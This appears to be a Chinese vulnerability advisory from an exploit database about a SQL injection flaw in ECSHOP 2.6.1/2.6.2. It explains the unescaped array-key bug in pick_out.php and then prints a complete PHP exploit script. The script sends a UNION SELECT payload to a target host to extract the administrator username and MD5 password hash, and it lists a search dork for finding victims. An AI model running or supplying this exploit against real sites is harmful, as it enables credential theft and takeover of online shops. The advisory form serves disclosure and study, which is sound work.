ECSHOP 2.6.1/2.6.2
SSV-ID: 11412
SSV-Appdir: ECSHOP
发布时间: 2009-05-25
影响版本:
漏洞描述:
文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep(): 1. // includes/init.php 2. if (!get_magic_quotes_gpc()) 3. { 4. if (!emptyempty($_GET)) 5. { 6. $_GET = addslashes_deep($_GET); 7. } 8. if (!emptyempty($_POST)) 9. { 10. $_POST = addslashes_deep($_POST); 11. } 12. 13. $_COOKIE = addslashes_deep($_COOKIE); 14. $_REQUEST = addslashes_deep($_REQUEST); 15. } addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理 1. // includes/lib_base.php 2. function addslashes_deep($value) 3. { 4. if (emptyempty($value)) 5. { 6. return $value; 7. } 8. else 9. { 10. return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value); 11. // 只处理了数组的值:) 12. } 13. } 下面看下具体的导致漏洞的代码,文件 pick_out.php里: 1. // pick_out.php 2. if (!emptyempty($_GET['attr'])) 3. { 4. foreach($_GET['attr'] as $key => $value) 5. { 6. $key = intval($key); 7. $_GET['attr'][$key] = htmlspecialchars($value); 8. // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value 9. // 因此可以引入任意的key:) 10. // 程序员的逻辑出了问题? 11. } 12. } 13. ... 14. foreach ($_GET['attr'] AS $key => $value) 15. { 16. $attr_url .= '&attr[' . $key . ']=' . $value; 17. 18. $attr_picks[] = $key; 19. if ($i > 0) 20. { 21. if (emptyempty($goods_result)) 22. { 23. break; 24. } 25. // 利用key进行注射:) 26. $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attrvalue='$value'"); 由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题,最终导致了注射漏洞.<*参考
ryat#wolvez.org*>
http://www.80vul.com
测试方法:
[sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1. #!/usr/bin/php 2. <?php 3. //本程序只作技术交流,请不要用做非法用途!! 4. print_r(' 5. +---------------------------------------+ 6. ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit 7. by puret_t 8. mail: puretot at gmail dot com 9. team: http://bbs.wolvez.org 10. dork: "Powered by ECShop" 11. +---------------------------------------+ 12. '); 13. /** 14. * works with magic_quotes_gpc = Off 15. */ 16. if ($argc < 3) { 17. print_r(' 18. +---------------------------------------+ 19. Usage: php '.$argv[0].' host path 20. host: target server (ip/hostname) 21. path: path to ecshop 22. Example: 23. php '.$argv[0].' localhost /ecshop/ 24. +---------------------------------------+ 25. '); 26. exit; 27. } 28. 29. error_reporting(7); 30. ini_set('max_execution_time', 0); 31. 32. $host = $argv[1]; 33. $path = $argv[2]; 34. 35. $resp = send(); 36. preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash); 37. 38. if ($hash) 39. exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); 40. else 41. exit("Exploit Failed!\n"); 42. 43. function send() 44. { 45. global $host, $path; 46. 47. $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat'; 48. 49. $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n"; 50. $data .= "Host: $host\r\n"; 51. $data .= "Connection: Close\r\n\r\n"; 52. 53. $fp = fsockopen($host, 80); 54. fputs($fp, $data); 55. 56. $resp = ''; 57. 58. while ($fp && !feof($fp)) 59. $resp .= fread($fp, 1024); 60. 61. return $resp; 62. } 63. 64. ?>